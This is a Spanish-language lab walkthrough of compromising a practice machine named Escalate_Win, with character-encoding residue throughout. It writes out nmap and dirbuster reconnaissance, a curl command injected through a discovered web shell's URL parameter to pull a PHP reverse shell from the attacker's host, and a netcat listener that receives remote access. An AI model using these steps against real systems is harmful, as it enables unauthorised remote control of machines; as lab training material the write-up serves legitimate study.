I"â<h1 id="pentesting-escalate_win">Pentesting Escalate_Win</h1>

<h3 id="reconocimiento">Reconocimiento</h3>
<p>Escaneamos con <strong>nmap</strong>:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>sudo nmap -p- -T4 [IP DE LA V√çCTIMA] -oN nmap.txt 
</code></pre></div></div>
<p><img src="/images/20220513115055.png" alt="" /></p>

<p>Vemos que la m√°quina tiene el puerto 80 abierto(<strong>http</strong>), por lo tanto, es accesible desde un navegador web:
<img src="/images/20220513115328.png" alt="" /></p>

<p>Lanzamos un ataque de diccionario con <strong>dirbuster</strong> para descubrir que directorios hay disponibles:
<img src="/images/20220513120012.png" alt="" /></p>

<p>Detectamos un archivo que parece interesante ‚Äú<strong>shell.php</strong>‚Äù:
<img src="/images/20220513120328.png" alt="" /></p>

<p><img src="/images/20220513121121.png" alt="" /></p>

<p>Como vemos se pueden ejecutar comandos a trav√©s de parametros en la url:
<img src="/images/20220513121252.png" alt="" /></p>

<h3 id="exploit">Exploit</h3>
<p>Para conseguir una consola interactiva con la m√°quina v√≠ctima utilizamos una <strong>shell inversa</strong> y <strong>netcat</strong>:</p>

<p>En este caso he escogido esta, ya que es compatible con Windows: https://github.com/ivan-sincek/php-reverse-shell/blob/master/src/reverse/php_reverse_shell.php</p>

<p>Descargamos la shell a nuestra m√°quina con el comando <strong>wget</strong>:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>wget https://raw.githubusercontent.com/ivan-sincek/php-reverse-shell/master/src/reverse/php_reverse_shell.php
</code></pre></div></div>

<p>Ahora editamos el c√≥digo de <strong>php_reverse_shell.php</strong> para que conecte a nuestra m√°quina:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>nano php_reverse_shell.php
</code></pre></div></div>
<p><img src="/images/20220513122810.png" alt="" /><br />
<em>En mi caso la ip de kali es 192.168.3.249 y utilizar√© el puerto 4444</em>
Una vez editado guardamos con <strong>CTRL+S</strong> y cerramos con <strong>CTRL+X</strong></p>

<p>Lo siguiente es iniciar un <strong>servidor http</strong> para poder descargar la shell en la m√°quina v√≠ctima:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>sudo python3 -m http.server 80
</code></pre></div></div>
<p><img src="/images/20220513123751.png" alt="" /></p>

<p>Descargamos la shell a la m√°quina v√≠ctima desde el navegador utilizando <strong>curl</strong>:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>http://[IP DE LA V√çCTIMA]/shell.php?cmd=curl+http://[IP DEL ATACANTE]/php_reverse_shell.php+-O+php_reverse_shell.php
</code></pre></div></div>
<p><em>Si todo ha ido bien, el servidor nos contestara con una p√°gina en blanco</em></p>

<p>Podemos ver que nuestro shell se ha subido correctamente:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>http://[IP DE LA V√çCTIMA]/shell.php?ls+-la
</code></pre></div></div>
<p><img src="/images/20220513125043.png" alt="" /><br />
Ya podemos cerrar el servidor http en kali.</p>

<p>Ponemos <strong>netcat</strong> a la escucha en el puerto 4444:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>nc -nlvp 4444
</code></pre></div></div>
<p><img src="/images/20220513125601.png" alt="" /></p>

<p>Lo unico que falta es ejecutar la shell en la m√°quina v√≠ctima:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>http://[IP DE LA V√çCTIMA]/php_reverse_shell.php.php
</code></pre></div></div>
<p><em>Si todo va bien, el navegador se quedara cargando.</em></p>

<p>Listo, hemos recibido una conexion en netcat que nos da acceso remoto a la m√°quina v√≠ctima:
<img src="/images/20220513130346.png" alt="" /></p>

<p><img src="/images/20220513130922.png" alt="" /></p>

<p>A partir de aqu√≠ pasar√≠amos a la fase de <strong>escalada de privilegios</strong>.</p>
:ET